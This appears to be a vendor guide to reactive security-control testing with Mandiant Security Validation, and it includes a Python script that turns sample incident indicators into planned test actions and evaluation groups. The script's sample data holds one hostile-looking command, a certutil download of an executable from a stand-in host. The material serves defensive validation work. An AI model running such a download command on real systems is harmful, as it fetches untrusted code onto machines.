Testing Strategies with Mandiant Security Validation - Reactive Testing

Mandiant Security Validation (MSV) is an automated and continuous approach to testing the efficacy of an organization's security controls against cyber threats. It is informed by timely threat intelligence and tests security controls by executing real attacks against them rather than relying on simulations or assumptions.

Effective security requires more than just implementing controls. Understanding their real-world effectiveness is crucial for protecting your organization from cyber threats. Mandiant Security Validation tackles this challenge by providing a comprehensive solution to test and evaluate your security posture.

Reactive Testing allows you to assess your security posture as it relates to recent events that may have occurred in your environment. Findings from any incident response can be used to create custom actions within MSV. These custom actions can then be used to validate that your security controls are able to prevent, detect, and alert on these indicators in the future. The Validation Research Team (VRT) also creates headline content from incidents and vulnerabilities. Released content can be found on the documentation portal.

Implementing Reactive Testing

Before creating a custom action, search the Action Library first to make sure MSV doesn't already have the action you're looking for. The guidelines below will help you create your own reactive testing actions and evaluation.

  • Identify the indicators you have around the incident. These could include but are not limited to commands, files, domains, pcaps, URLs, emails, and cloud resources.
  • Any files that will be used in Host CLI actions must first be uploaded to the File Library. To do this, navigate to Library > File Library and select Upload File. Be sure to set the file restrictions for any file that is malicious or destructive in nature.
  • In order to create a custom action, you must have the following permissions set for your account. User permissions can be updated by going to Settings > User Settings and selecting Edit for a particular user.
    • Approve Cloud Actions
    • Approve Endpoint Actions
    • Approve on Action Creation
    • Approve File Library Restrictions
  • To create a custom action, navigate to Library > Actions and select Add Action. From here, you can select the type of custom action that is desired. Your organization needs to be licensed for Captive IOC and Cloud Validation Module in order to create and run these types of actions.
  • Captive IOC actions do require additional configuration and setup. Please see our documentation on how to get started.
  • The actions in your reactive evaluation should be grouped into evaluations of 20-30 actions each. This best practice ensures your evaluation is performant and does not overwhelm the Director or Actors during runtime.
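The steps above can be rehearsed before touching the console. The following Python script is an added example, not Mandiant code and not the MSV API: it takes a constructed list of incident indicators, maps each to the kind of custom action it would become, flags files that must go to the File Library (and which of those need restrictions), notes which licensed modules would be involved, and splits the resulting actions into evaluation groups of at most 30 actions, kept as even as possible so that groups land in the 20-30 range whenever the total allows. The indicator kinds, the kind-to-action-type and kind-to-module mappings, and the sample indicators are all assumptions made for the example.

```python
"""Plan an MSV reactive evaluation from incident indicators.

Added example for this page. It is not Mandiant code and does not call the
MSV API; it only models the planning steps described in the list above on a
constructed indicator set.
"""
from dataclasses import dataclass

# Assumed mapping from indicator kind to the custom action type it becomes.
ACTION_TYPE = {
    "command": "Host CLI",
    "file": "Host CLI",
    "domain": "Network",
    "url": "Network",
    "pcap": "Network",
    "email": "Email",
    "cloud": "Cloud",
}

# Assumed mapping from indicator kind to a licensed module the page names.
MODULE_REQUIRED = {
    "pcap": "Captive IOC",
    "cloud": "Cloud Validation Module",
}

MAX_PER_EVALUATION = 30   # upper end of the 20-30 actions guideline


@dataclass
class Action:
    kind: str
    value: str
    action_type: str
    needs_upload: bool = False   # file must be uploaded to the File Library first
    restricted: bool = False     # malicious/destructive file: set file restrictions


# Constructed sample: (kind, value, is_malicious) from a hypothetical incident.
SAMPLE_INDICATORS = [
    ("command", "certutil -urlcache -split -f http://example.invalid/a.exe", False),
    ("file", "payload.exe", True),
    ("file", "collector.ps1", False),
    ("domain", "example.invalid", False),
    ("url", "http://example.invalid/a.exe", False),
    ("email", "invoice.eml", False),
    ("cloud", "arn:aws:iam::123456789012:role/hypothetical-role", False),
]


def build_actions(indicators):
    """Turn (kind, value, is_malicious) tuples into Action records."""
    actions = []
    for kind, value, malicious in indicators:
        if kind not in ACTION_TYPE:
            raise ValueError(f"unknown indicator kind: {kind!r}")
        actions.append(Action(
            kind=kind,
            value=value,
            action_type=ACTION_TYPE[kind],
            needs_upload=(kind == "file"),
            restricted=(kind == "file" and malicious),
        ))
    return actions


def split_into_evaluations(actions, max_size=MAX_PER_EVALUATION):
    """Split actions into the fewest groups of at most max_size, sized evenly.

    Even sizing keeps every group inside the 20-30 band whenever the total
    allows it (65 actions -> 22, 22, 21). When the total cannot be split that
    way (31 actions -> 16, 15) no grouping satisfies both bounds, and the
    even split is still preferred over one full group plus one tiny group.
    """
    n = len(actions)
    if n == 0:
        return []
    groups = -(-n // max_size)          # ceiling division
    base, extra = divmod(n, groups)
    out, start = [], 0
    for i in range(groups):
        size = base + (1 if i < extra else 0)
        out.append(actions[start:start + size])
        start += size
    return out


def plan_evaluations(indicators):
    """Return uploads to perform, modules involved, and the grouped actions."""
    actions = build_actions(indicators)
    uploads = [a for a in actions if a.needs_upload]
    modules = sorted({MODULE_REQUIRED[a.kind] for a in actions if a.kind in MODULE_REQUIRED})
    return {
        "uploads": uploads,
        "modules": modules,
        "evaluations": split_into_evaluations(actions),
    }


if __name__ == "__main__":
    plan = plan_evaluations(SAMPLE_INDICATORS)
    for a in plan["uploads"]:
        print(f"upload to File Library: {a.value} (restricted={a.restricted})")
    print("modules involved:", ", ".join(plan["modules"]) or "none")
    for i, group in enumerate(plan["evaluations"], 1):
        print(f"evaluation {i}: {len(group)} actions")
```

Run it as a script to see the upload checklist and the group sizes; the same functions can be fed a much longer indicator list exported from an incident report to see how many evaluations it would need.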

As opposed to baseline testing, where evaluations are scheduled on a recurring basis (weekly, monthly, quarterly), reactive testing should be repeated until the gaps exposed by the actions are remediated. Because these actions typically represent an incident that has occurred in your environment, identifying gaps and remediation steps is critical.
